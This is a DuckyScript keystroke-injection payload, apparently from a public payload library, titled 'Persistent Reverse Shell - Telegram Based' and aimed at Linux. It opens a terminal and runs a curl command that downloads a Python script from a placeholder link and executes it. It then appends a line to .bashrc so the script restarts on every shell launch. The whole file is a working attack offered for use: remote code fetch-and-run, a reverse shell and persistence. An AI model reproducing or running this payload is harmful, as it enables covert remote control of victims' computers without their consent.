Path: blob/master/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/payload.txt
2971 views
REM ############################################################1REM # #2REM # Title : Persistent Reverse Shell - Telegram Based #3REM # Author : Aleff #4REM # Version : 1.0 #5REM # Category : Execution #6REM # Target : Linux #7REM # #8REM ############################################################910REM Requirements:11REM - Internet Connection1213REM Here you must put your own file link14DEFINE #PYTHON-SCRIPT-LINK https://www.example.com/connection.py1516DELAY 100017CTRL-ALT t18DELAY 20001920STRINGLN_BLOCK21curl -o connection.py #PYTHON-SCRIPT-LINK; python3 connection.py; echo "if ! pgrep -f connection.py >/dev/null; then22python3 connection.py &23fi" >> .bashrc; exit24END_STRINGLN252627